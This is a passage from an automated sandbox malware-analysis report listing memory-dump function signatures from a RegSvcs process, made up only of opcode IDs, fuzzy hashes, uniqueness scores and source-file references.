                                                                                                                              • Instruction ID: fd5a38ef3c02ea4c6f21b3c470d532ef5e03795948c6e866f0787bfa9b69ab52
                                                                                                                              • Opcode Fuzzy Hash: 8a48a2c2731474f63c06017ecb88c7f4ddd3a7e6ff3e713ebb8932b9bf35e39f
                                                                                                                              • Instruction Fuzzy Hash: DA410331900302CBD724CF5DD880A6ABBB9FFA4718F15812FD9219F369D7759842CBA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 733bf08fc8cff8f9ad72baf0b527e2b09753e4867608a019da0e015bf3b5b942
                                                                                                                              • Instruction ID: 7ae047acf014addcb76e54b8a32d49551761a67a9f40f381c6ca7519e2bd5748
                                                                                                                              • Opcode Fuzzy Hash: 733bf08fc8cff8f9ad72baf0b527e2b09753e4867608a019da0e015bf3b5b942
                                                                                                                              • Instruction Fuzzy Hash: B0414E315083069ED312DF668880A6BB7E9EF94B54F41092FF984D7261E730DE058BA3
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                              • Instruction ID: f28a8f68efc52c086fa2893069c8049f1caa1b6fda379863ab80f302b73714cb
                                                                                                                              • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                              • Instruction Fuzzy Hash: B6413C71A00211EBDB21DF5D84A07FBBBA1EB60B54F25816BED45CB362D6328D41C7A0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6d71428320a210a82cfc06da8f3f2347c1acaede5d59bd3dd556fa2a5f7ca7bc
                                                                                                                              • Instruction ID: 104c1194353d3b12a5725c38af9887d3413337d4193dd559b6f8049127917ec8
                                                                                                                              • Opcode Fuzzy Hash: 6d71428320a210a82cfc06da8f3f2347c1acaede5d59bd3dd556fa2a5f7ca7bc
                                                                                                                              • Instruction Fuzzy Hash: 36416971640601EFD321CF19C840B6ABBF9EF64358F20866FE4498B361E770E9428B91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                              • Instruction ID: fa245f1dbc56c5c763a684c7d1bd10001d293db393bc6a73098643e31f5ec091
                                                                                                                              • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                              • Instruction Fuzzy Hash: 49412A71A00705EFDB24CF99C980AAABBF9FF18710B10496EE556DB6A0D330EA45CF50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: fc68cdee0f01eced69227377821e964e478cbfe51f9b4b426cde99b6fdbf0bc0
                                                                                                                              • Instruction ID: eee3f92daad2cfe890240db00b062cc2ae784b0be8bc82ed08857f9869fdd435
                                                                                                                              • Opcode Fuzzy Hash: fc68cdee0f01eced69227377821e964e478cbfe51f9b4b426cde99b6fdbf0bc0
                                                                                                                              • Instruction Fuzzy Hash: 3E419CB1501701EFCB21EF29C940E6AB7F9FF64229F10866FC41A9B6B1DB709941CB52
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b3b7c8ac619222b2952edc53a2a5ed48760dba5bbe0487eff41722eccc30ca0d
                                                                                                                              • Instruction ID: ed379b430ae7c394dea5b847cb43cd1fb9482aa451a3fde3ccd6692482ff6d5a
                                                                                                                              • Opcode Fuzzy Hash: b3b7c8ac619222b2952edc53a2a5ed48760dba5bbe0487eff41722eccc30ca0d
                                                                                                                              • Instruction Fuzzy Hash: 5F3149B1A00255DFDB11CF58C480B99BBF0FB59724F2085AED519EB261D3769902CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b295a84978fb55606a2015d1dc7f3e6d8678aefcc2f6851bee67f3856da27c00
                                                                                                                              • Instruction ID: fe77039fcbddddc25605c16a28a2ee2922f7d11cef683f1828e77d3c21464cf4
                                                                                                                              • Opcode Fuzzy Hash: b295a84978fb55606a2015d1dc7f3e6d8678aefcc2f6851bee67f3856da27c00
                                                                                                                              • Instruction Fuzzy Hash: 6241D171A05517AFDB41DF1AC880AA9BBB1FB54664F14822BDC16A72A2DF30ED418B90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: baf648b023f59604c537bf851a6a5dc0900ea5562163acb3ce9cc35620970a4f
                                                                                                                              • Instruction ID: 99a824645f1d5cb1b6c084d7528c372007e58d1cd43adeff17fcfc2775145af0
                                                                                                                              • Opcode Fuzzy Hash: baf648b023f59604c537bf851a6a5dc0900ea5562163acb3ce9cc35620970a4f
                                                                                                                              • Instruction Fuzzy Hash: 2841D3726046419FD320DF29C844B6BB7E5BFD8700F14061EF9A89B6A0E770E905CBA6
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 26120bee39d62ba117f7c3358b6164c75df85d817d7ba13087efd73417147f49
                                                                                                                              • Instruction ID: c8cc10502e395faf6843e1228b925efc8e6a1fd5f069bd8f78364cd3423ba9b7
                                                                                                                              • Opcode Fuzzy Hash: 26120bee39d62ba117f7c3358b6164c75df85d817d7ba13087efd73417147f49
                                                                                                                              • Instruction Fuzzy Hash: 0241B2702403018BDB25DF29D894B2BBBE9EF90758F18442EE6558B2B1D770D849CB52
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6c330d4679af936d1de5db3faf5cfe7d7f3e0e3e38ae127984a7672a8f62214e
                                                                                                                              • Instruction ID: d1aa88e4764cec96be75349df69c69da8e2afcff06407a494ef833ca056546b1
                                                                                                                              • Opcode Fuzzy Hash: 6c330d4679af936d1de5db3faf5cfe7d7f3e0e3e38ae127984a7672a8f62214e
                                                                                                                              • Instruction Fuzzy Hash: BB419171A01606DFCB55CF6AC98099DB7F1FF98320B14862FD866A7372DB349941CB50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                              • Instruction ID: c02462f0f51149d0049ad851b8d88265209221bad635bbf34782eae5626c9e95
                                                                                                                              • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                              • Instruction Fuzzy Hash: 64312531A01244AFDB22CB69CC80BDBBFE9AF25350F0445ABF855D7362D2749885CBA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 70dc7473f89b1306303483851018f90f4ab490e341552fdd9566dc20879b1df9
                                                                                                                              • Instruction ID: 276b1ffc9e4bde6d8f80bd75f94c59a089b9d92f5c85d1d0fe129b61205ef2cc
                                                                                                                              • Opcode Fuzzy Hash: 70dc7473f89b1306303483851018f90f4ab490e341552fdd9566dc20879b1df9
                                                                                                                              • Instruction Fuzzy Hash: AC319631740706ABD722AFA58C41FAF76A9FB68B50F110429F600AF3D1DAB4DC0087A0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 242d37610b40109fc029dd78ff78456bf628db0409fe908685b5d936dff6d85f
                                                                                                                              • Instruction ID: 50200ee3f574b8a6ca99a9a6ff25786c0f75095b0d125cc51db369d7fc7eb701
                                                                                                                              • Opcode Fuzzy Hash: 242d37610b40109fc029dd78ff78456bf628db0409fe908685b5d936dff6d85f
                                                                                                                              • Instruction Fuzzy Hash: BB312C719003518BD721AF58CC90BE97774EF50318F5481AFD94A9F362DA749986CBA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                              • Instruction ID: e59daac1783ba313d5baa4821750ed4936f01e14da854ec9c6377048473701f7
                                                                                                                              • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                              • Instruction Fuzzy Hash: 91214D3A6806536AEB16AB958840BBABBB4FF90711F40801FFA558F661E676D940C360
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 39788ebe016977a224020cf499462f46b625e813fe2e24f1d089b87975c06a67
                                                                                                                              • Instruction ID: d287be72b845170770989457ddc2f2b503cca1f906e001fb46af44ee2ade0c72
                                                                                                                              • Opcode Fuzzy Hash: 39788ebe016977a224020cf499462f46b625e813fe2e24f1d089b87975c06a67
                                                                                                                              • Instruction Fuzzy Hash: 1231D831A0011C9BDB31DF19CC41FEEBBB9AB25744F4101A6EA45B72A1D6749F818F91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                              • Instruction ID: b0323c752e2c3837af0675a9451e48051f6b9c5093813b811833946dd966cc95
                                                                                                                              • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                              • Instruction Fuzzy Hash: E121A271A00605EBCF14CF59CA80A8ABFA5FF58310F14816AEE199F250D674DE02CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8b3c741a61dddf82207ed29c83f3ee2aa411c54a023da5b74182c2259bffe1d7
                                                                                                                              • Instruction ID: 51be965f454dda76974faec19239c84439b79c706475996b9702809983aa7aff
                                                                                                                              • Opcode Fuzzy Hash: 8b3c741a61dddf82207ed29c83f3ee2aa411c54a023da5b74182c2259bffe1d7
                                                                                                                              • Instruction Fuzzy Hash: 6021E3726047059BCB22DF59C940B6B7BE4FB88760F09451AFE549B351C730E9028BA2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                                              • Instruction ID: 177bbe39b06eb39c06545d442b6fd35a5f4d8b8df1c4ed94b4609bdfd20c652b
                                                                                                                              • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                                              • Instruction Fuzzy Hash: 4C319E31600605EFE711CF69C984F6AB7B9FF45354F1045AAE9129B2A2E770EE02CB50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ebe55242c331c37f7d61c4a8d918e2d8323e1cebe6175b5f52b305b0679640f5
                                                                                                                              • Instruction ID: e45f8cac8eb2e7832054715393898957674882789541a114853a433fc6eafdd8
                                                                                                                              • Opcode Fuzzy Hash: ebe55242c331c37f7d61c4a8d918e2d8323e1cebe6175b5f52b305b0679640f5
                                                                                                                              • Instruction Fuzzy Hash: DA31B175A00245DFCF14CF1CC8A49AEB7B5FF84704B95845AE809AF3A1E731EA41CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a4b0cb1bc69a4d84f795cf71a63c9573365fc4a0c04afb1d51f57f64a6d25e2a
                                                                                                                              • Instruction ID: 58322dc5b2a2a3d2da8de43c63159b53f1b48df2788872d58469571d5b4e4fcd
                                                                                                                              • Opcode Fuzzy Hash: a4b0cb1bc69a4d84f795cf71a63c9573365fc4a0c04afb1d51f57f64a6d25e2a
                                                                                                                              • Instruction Fuzzy Hash: B1219471A002299BCF20DF59C881ABEB7F4FF58740B55006AF551BB250D778AD42CFA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e6190f6b6dbbf55b3d77d5b98bb30146a7d67ec105d29e67f0fa7ed6b1718f08
                                                                                                                              • Instruction ID: 839f33adf374c345d023615e145b1fb83cbb124710ee06f6c0966c008609e13f
                                                                                                                              • Opcode Fuzzy Hash: e6190f6b6dbbf55b3d77d5b98bb30146a7d67ec105d29e67f0fa7ed6b1718f08
                                                                                                                              • Instruction Fuzzy Hash: 7521A972A00645AFD715DF69C984B6AB7E8FF68740F14006AF904DB7A0E674ED01CBA8
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4ee671e4f37e5188a52dabe75da19f7a4ae1634c1a080161a8035bfebcbd1f7a
                                                                                                                              • Instruction ID: 87e71d87d462b4b17111c0a00b3268c0189f060c78107b13b42b39adc2d657f0
                                                                                                                              • Opcode Fuzzy Hash: 4ee671e4f37e5188a52dabe75da19f7a4ae1634c1a080161a8035bfebcbd1f7a
                                                                                                                              • Instruction Fuzzy Hash: B321D072A043469FE711EF5AC848B9BBBECAFA1640F08045BBDA0C7271D770C905C6A2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7502b8279e0c3edab3305c4b63e0bddfccbb421ef5bd2f4d15a42967d534cdae
                                                                                                                              • Instruction ID: 7511d63af607107973ec96cd3e32c498fce12c886b088ec4099ccc724f391bf3
                                                                                                                              • Opcode Fuzzy Hash: 7502b8279e0c3edab3305c4b63e0bddfccbb421ef5bd2f4d15a42967d534cdae
                                                                                                                              • Instruction Fuzzy Hash: F2210A316156869BF722A72D8D04F193B95AB41B64F28036AF9209B7F2E7B8C843C241
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: bd869c32d7eacd8448364a8a390c852d77560d16575dcb45151439a7c052ac26
                                                                                                                              • Instruction ID: 945a2151f0736d0904bf38dac41c7f8804185c1f92d1c16ac72584c5660680d1
                                                                                                                              • Opcode Fuzzy Hash: bd869c32d7eacd8448364a8a390c852d77560d16575dcb45151439a7c052ac26
                                                                                                                              • Instruction Fuzzy Hash: 4621BB35200A419FCB25DF2ACC10B56B7F5FF58B04F24846EA509CBB61E331E842CB94
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              • Opcode ID: b7ec1e50959b75970c4b04eb303a5664d8c3b30be1ccb86cfde64645188b1977
                                                                                                                              • Instruction ID: 33788a97676dbf8edfa36b23fecb5ef4ca5e264c50dc67ea99d89addc225628e
                                                                                                                              • Opcode Fuzzy Hash: b7ec1e50959b75970c4b04eb303a5664d8c3b30be1ccb86cfde64645188b1977
                                                                                                                              • Instruction Fuzzy Hash: A6016675305249AFF312A22ED884F2B7B9CEF50794F15006BF9008B271EA74DC02C2A1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0ed85ca52511b7ef35c72c1ef1f454045296d8818f09071fa766598dd0e3db35
                                                                                                                              • Instruction ID: 2ad95eed38b39e5b8751f0d80656b0516c254963fbff6358d74392a76f0a447e
                                                                                                                              • Opcode Fuzzy Hash: 0ed85ca52511b7ef35c72c1ef1f454045296d8818f09071fa766598dd0e3db35
                                                                                                                              • Instruction Fuzzy Hash: 4411E076200641AFDF21CF99C880B577BACEB95B6AF08411BF9048B760C338E840CF61
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 899873491b8dd5c703993618d872b277a291c82efffb23741f39d78fe0b5c464
                                                                                                                              • Instruction ID: bddfcfa934cd07dfbd26564be2a9d6b42b18abf874c41a2f38ac44de412bd46e
                                                                                                                              • Opcode Fuzzy Hash: 899873491b8dd5c703993618d872b277a291c82efffb23741f39d78fe0b5c464
                                                                                                                              • Instruction Fuzzy Hash: 1611E9362006119FDB26DA69D850F5BBBE5FFC4710F154419E692CB790DB34E802C790
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 39259af6ebe53da820296987c0a5b0001edf02f01e12b815ca9c4085f83c7bc4
                                                                                                                              • Instruction ID: 83f00d89a9e51aed701ef30753d4c0e52c095d05554f5ad0f0ba561b18fe4347
                                                                                                                              • Opcode Fuzzy Hash: 39259af6ebe53da820296987c0a5b0001edf02f01e12b815ca9c4085f83c7bc4
                                                                                                                              • Instruction Fuzzy Hash: A1118272A00715ABDB21DF6AC980B5EFFB8FF94750F52045ADA05AB320D730AD018B90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: dc2497d439290f106205f8c59f04af57e5cfb45493ac5ff6b16d9837507ec8a5
                                                                                                                              • Instruction ID: dd9f2b3f203f01c73bf18561a4fddf969fe6ac2f43dd32591d830a4f3cd0561f
                                                                                                                              • Opcode Fuzzy Hash: dc2497d439290f106205f8c59f04af57e5cfb45493ac5ff6b16d9837507ec8a5
                                                                                                                              • Instruction Fuzzy Hash: B301D2715102059FC325EB19D414F2ABBF9FB91718F25816FE1049B270E770EC46DB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
